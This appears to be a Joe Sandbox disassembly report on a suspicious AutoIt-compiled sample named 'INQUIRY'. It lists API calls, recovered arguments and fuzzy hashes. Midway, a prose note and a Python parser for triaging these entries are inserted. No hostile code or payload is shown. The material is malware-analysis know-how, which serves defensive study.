                                                                                              • Instruction ID: 63d56adc223326688775c1c85bdbd9ff8ddfcb04874654a04b71efbb762c6e9f
                                                                                              • Opcode Fuzzy Hash: 5930e498d5eda28642b9942498f147e92246bffe31f168fbef678fc5a02f380f
                                                                                              • Instruction Fuzzy Hash: C9018470644748FEF3204F24CC8AFA636DCAB41768F208315BBE59A1E0C6B41C958B94
                                                                                              APIs
                                                                                                • Part of subcall function 00A3571C: __FF_MSGBANNER.LIBCMT ref: 00A35733
                                                                                                • Part of subcall function 00A3571C: __NMSG_WRITE.LIBCMT ref: 00A3573A
                                                                                                • Part of subcall function 00A3571C: RtlAllocateHeap.NTDLL(010D0000,00000000,00000001,00000000,?,?,?,00A30DD3,?), ref: 00A3575F
                                                                                              • std::exception::exception.LIBCMT ref: 00A30DEC
                                                                                              • __CxxThrowException@8.LIBCMT ref: 00A30E01
                                                                                                • Part of subcall function 00A3859B: RaiseException.KERNEL32(?,?,?,00AC9E78,00000000,?,?,?,?,00A30E06,?,00AC9E78,?,00000001), ref: 00A385F0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 3902256705-0
                                                                                              • Opcode ID: ce153a26075b1498d67975e369fb1a28c7085de35174be2a245afb3fdf56e480
                                                                                              • Instruction ID: 2a0c7fe95ee4bc776c3c102b5f318faf2ec6d7428e448a60f68f3879dda00001
                                                                                              • Opcode Fuzzy Hash: ce153a26075b1498d67975e369fb1a28c7085de35174be2a245afb3fdf56e480
                                                                                              • Instruction Fuzzy Hash: 5DF0A43194031966DB10BBA8ED15EDF77AC9F01351F104469F904A6982EF719A5082D1
APIs
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: __lock_file_memset
• String ID:
• API String ID: 26237723-0
• Opcode ID: 8e7800f242558677aaa082b79faab8ca371f55d502e9b6ad0d8422c5bbff47ad
• Instruction ID: 152ff96a5866b4a1b747cf5bac841d3e7e212babe7cb16d2208fa434e0bf7f58
• Opcode Fuzzy Hash: 8e7800f242558677aaa082b79faab8ca371f55d502e9b6ad0d8422c5bbff47ad
• Instruction Fuzzy Hash: F301F2B1C00A08EBCF12AFBC9E0399E7B61BF90361F488115F8241B1A1EB358A11DF91
APIs
  • Part of subcall function 00A38B28: __getptd_noexit.LIBCMT ref: 00A38B28
• __lock_file.LIBCMT ref: 00A353EB
  • Part of subcall function 00A36C11: __lock.LIBCMT ref: 00A36C34
• __fclose_nolock.LIBCMT ref: 00A353F6
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
• Opcode ID: 4a4b9c5b1ac570cb8b89d3b6ea69eaba6481f79d95aaeb8031e9244b7980a475
• Instruction ID: a6add73ec7a69637aa33da2c44de849ace6108abe6d345baba9ec28e735e0520
• Opcode Fuzzy Hash: 4a4b9c5b1ac570cb8b89d3b6ea69eaba6481f79d95aaeb8031e9244b7980a475
• Instruction Fuzzy Hash: 74F09071C01B049ADB11BF7999067AD6AE06F41374F218208B424AF1C1CFBC89419F92
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00A1542F,?,?,?,?,?), ref: 00A1807A
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00A1542F,?,?,?,?,?), ref: 00A180AD
  • Part of subcall function 00A1774D: _memmove.LIBCMT ref: 00A17789
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: ByteCharMultiWide$_memmove
• String ID:
• API String ID: 3033907384-0
• Opcode ID: 535aa23c5fffa600a749c328c24660b8e3064d612a3e0c9bac3237734c830043
• Instruction ID: b22d82ae2809ebab97ef6ddb4c38c521cbba1c5cbebcda1508e8bcaae5b0ea3b
• Opcode Fuzzy Hash: 535aa23c5fffa600a749c328c24660b8e3064d612a3e0c9bac3237734c830043
• Instruction Fuzzy Hash: E501A231201118BFEB246B61DD46FBB7B6DEF89360F20802AF905CE190DE2198408661
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0b879618d28d49ae5dd4caee412db2c6e84d687b1d7acabd79c2c5e0da67fcbb
• Instruction ID: 8df84dd15dd945bae5816fcbb020e887a57d5c843eb06f2f6af31e5679496465
• Opcode Fuzzy Hash: 0b879618d28d49ae5dd4caee412db2c6e84d687b1d7acabd79c2c5e0da67fcbb
• Instruction Fuzzy Hash: 69515F31A04614EFCF14EF68CA91FAE77B6AF85310F548568F806AB392DA30ED45CB51
APIs
• SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00A15B96
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 44914da356dab96595c7682eca235ecbe5a13f530ca8cc7822231acceb247f62
• Instruction ID: 75bcf643149b9aa9552b3880b37bfc9ef2c6c782febcffe4e443f9d0e898304a
• Opcode Fuzzy Hash: 44914da356dab96595c7682eca235ecbe5a13f530ca8cc7822231acceb247f62
• Instruction Fuzzy Hash: F1313C31E08A15EFCB18DF6DC580AADB7B5FF84310F148629D81593750E770A990CB90
APIs
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 6505c8ecc2d17abb7c40d6752f576fd40601c071afefc98e0a0a6c8db4c1d7ef
• Instruction ID: 70be65da0cc10dd4c376051da6d67ff154b781fea28401a3756c15fd523f39b1
• Opcode Fuzzy Hash: 6505c8ecc2d17abb7c40d6752f576fd40601c071afefc98e0a0a6c8db4c1d7ef
• Instruction Fuzzy Hash: 0F4107746043519FDB14DF14C454B5ABBE1BF85318F1988ACE89A8B362C732E885CF92
APIs
  • Part of subcall function 00A14BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00A14BEF
  • Part of subcall function 00A3525B: __wfsopen.LIBCMT ref: 00A35266
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00AD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A14E0F
  • Part of subcall function 00A14B6A: FreeLibrary.KERNEL32(00000000), ref: 00A14BA4
  • Part of subcall function 00A14C70: _memmove.LIBCMT ref: 00A14CBA
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Library$Free$Load__wfsopen_memmove
• String ID:
• API String ID: 1396898556-0
• Opcode ID: 23cde09014090edc2430f3bab86b7b4985df16515e9484a354efbad0331e130d
• Instruction ID: e191f3259315ce6efbccf67d632e33e181598a1fb11c8b5fdd427325c2e86fdc
• Opcode Fuzzy Hash: 23cde09014090edc2430f3bab86b7b4985df16515e9484a354efbad0331e130d
• Instruction Fuzzy Hash: F011E331604205ABCF10FFB8CE12FEE77A9AF88710F108829F541E71C1DA719A419B50
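The function-summary entries above (API list with recovered arguments, API ID, opcode and instruction fuzzy hashes) are easier to triage once they are parsed into records. The Python below is an added example, not part of the Joe Sandbox report or of its tooling. It parses entries in the layout shown on this page, using two of them (the MultiByteToWideChar function and the LoadLibraryExW function) as a constructed inline sample, and names the arguments an analyst checks first: the MultiByteToWideChar code page 0000FDE9 (65001, CP_UTF8) and the LoadLibraryExW dwFlags value 00000002 (LOAD_LIBRARY_AS_DATAFILE, which maps the file as data without running its entry point), plus any literal string recovered from the stack such as >>>AUTOIT NO CMDEXECUTE<<<. The Win32 constant values are documented; the section and field names are taken from this page, and everything else in the block is an assumption about the report layout. Lines the parser does not recognise are skipped rather than guessed at.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two function-summary entries copied from the report above, trimmed
# to the fields this parser reads (bullets and "Part of subcall" indentation as printed).
SAMPLE = """\
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,00A1542F,?,?,?,?,?), ref: 00A1807A
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,00A1542F,?,?,?,?,?), ref: 00A180AD
  • Part of subcall function 00A1774D: _memmove.LIBCMT ref: 00A17789
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
Similarity
• API ID: ByteCharMultiWide$_memmove
• Instruction Fuzzy Hash: E501A231201118BFEB246B61DD46FBB7B6DEF89360F20802AF905CE190DE2198408661
APIs
  • Part of subcall function 00A14BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00A14BEF
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00AD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A14E0F
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
Similarity
• API ID: Library$Free$Load__wfsopen_memmove
• Instruction Fuzzy Hash: F011E331604205ABCF10FFB8CE12FEE77A9AF88710F108829F541E71C1DA719A419B50
"""

SECTION_HEADERS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "<Name>.<Module>(<args>), ref: <addr>", or "<crt_helper>.LIBCMT ref: <addr>" without arguments.
CALL_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?(?P<name>\w+)\.(?P<module>\w+)"
                     r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
# Documented Win32 constant values (not taken from the report).
CODE_PAGES = {0: "CP_ACP", 1: "CP_OEMCP", 65001: "CP_UTF8"}
LOAD_LIBRARY_FLAGS = {0x1: "DONT_RESOLVE_DLL_REFERENCES", 0x2: "LOAD_LIBRARY_AS_DATAFILE",
                      0x8: "LOAD_WITH_ALTERED_SEARCH_PATH", 0x20: "LOAD_LIBRARY_AS_IMAGE_RESOURCE",
                      0x40: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # set when the call sits in a "Part of subcall function" line

@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)  # "API ID", "Instruction Fuzzy Hash", ...

def parse_call(body: str) -> Optional[ApiCall]:
    m = CALL_RE.match(body)
    if not m:
        return None  # unknown line shape: skipped rather than guessed at
    raw = m.group("args")
    # Stack strings in these traces contain no commas, so a plain split is safe here.
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("name"), m.group("module"), args, m.group("ref"), m.group("sub"))

def parse_report(text: str) -> List[FunctionEntry]:
    entries, current, section = [], FunctionEntry(), None
    for line in (raw_line.strip() for raw_line in text.splitlines()):
        if line in SECTION_HEADERS:
            section = line
        elif line.startswith("•"):
            body = line[1:].strip()
            if section == "APIs":
                call = parse_call(body)
                if call:
                    current.calls.append(call)
            else:
                key, _, value = body.partition(":")
                current.fields[key.strip()] = value.strip()
                if key.strip() == "Instruction Fuzzy Hash":  # last field Joe Sandbox prints per function
                    entries.append(current)
                    current = FunctionEntry()
    return entries

def hex_arg(arg: str) -> Optional[int]:
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None

def decode_call(call: ApiCall) -> Dict[str, object]:
    """Name the arguments an analyst checks first; everything else stays raw."""
    out: Dict[str, object] = {}
    if call.name == "MultiByteToWideChar" and call.args and (cp := hex_arg(call.args[0])) is not None:
        out["code_page"] = f"{CODE_PAGES.get(cp, 'unknown')} ({cp})"
    if call.name == "LoadLibraryExW" and len(call.args) > 2 and (fl := hex_arg(call.args[2])) is not None:
        out["flags"] = [name for bit, name in LOAD_LIBRARY_FLAGS.items() if fl & bit]
    # Literal strings the sandbox recovered from the stack are worth surfacing on their own.
    out["strings"] = [a for a in call.args if a != "?" and hex_arg(a) is None]
    return out

def index_by_api(entries: List[FunctionEntry]) -> Dict[str, List[int]]:
    """Map API name -> indices of the functions that call it (directly or via a subcall)."""
    idx: Dict[str, List[int]] = {}
    for i, e in enumerate(entries):
        for c in e.calls:
            if i not in idx.setdefault(c.name, []):
                idx[c.name].append(i)
    return idx

if __name__ == "__main__":
    for e in parse_report(SAMPLE):
        print(e.fields.get("API ID"), [(c.name, decode_call(c)) for c in e.calls])
```

Run against a whole report, `index_by_api` answers "which functions touch LoadLibraryExW or ReadFile" in one lookup, and the Instruction Fuzzy Hash field of each entry is what to pivot on when comparing this sample's functions against other AutoIt-compiled binaries.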
APIs
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: d2e8ca1450afd42e88cd619902c7f04f3e3e97e15327ab62ce90032bc6a20655
• Instruction ID: 4a2ea3f861b0ae2ded9525df986a72ef49ffe6231433a6bec71fdde3b3a9a6db
• Opcode Fuzzy Hash: d2e8ca1450afd42e88cd619902c7f04f3e3e97e15327ab62ce90032bc6a20655
• Instruction Fuzzy Hash: 86210FB4A08311DFCB14DF64D454B5ABBE1BF88314F058968F88A97722D731E849CB92
APIs
• ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00A156A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00A15C16
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: bc1ce4290fc9554363b87683944546318024309501fbe7516ff2e4036c07ad22
• Instruction ID: 5cc1e90a55963fe7b1c8fb4445b12043f44d783e50cb59dc2a15e805296524c0
• Opcode Fuzzy Hash: bc1ce4290fc9554363b87683944546318024309501fbe7516ff2e4036c07ad22
• Instruction Fuzzy Hash: A1113D31608B04DFD320CF65C440BA2B7F4EF84754F10C51EE99A8A651D770E885CB50
APIs
• __lock_file.LIBCMT ref: 00A348A6
  • Part of subcall function 00A38B28: __getptd_noexit.LIBCMT ref: 00A38B28
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
• Opcode ID: 5b19fe4209d1e4f76b1d4d5d78548957e5c742daa5dcc609afbd2850d8b7cae8
• Instruction ID: 106505ea5ed3409f268cb91fdb323d8209e8f7b83c67c752c472ab8b7de3cdfc
• Opcode Fuzzy Hash: 5b19fe4209d1e4f76b1d4d5d78548957e5c742daa5dcc609afbd2850d8b7cae8
• Instruction Fuzzy Hash: 96F0CD31901709EBEF11AFB48D067AE7AA0AF05329F158418F424AB191CBBC9A51DB91
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?,?,00AD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A14E7E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              APIs
                                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A307B0
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongNamePath_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2514874351-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock
                                                                                              • String ID:
                                                                                              • API String ID: 2638373210-0
                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00A4DD42,?,?,00000000), ref: 00A15C5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wfsopen
                                                                                              • String ID:
                                                                                              • API String ID: 197181222-0
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000002,00000000), ref: 00A7D1FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1452528299-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              APIs
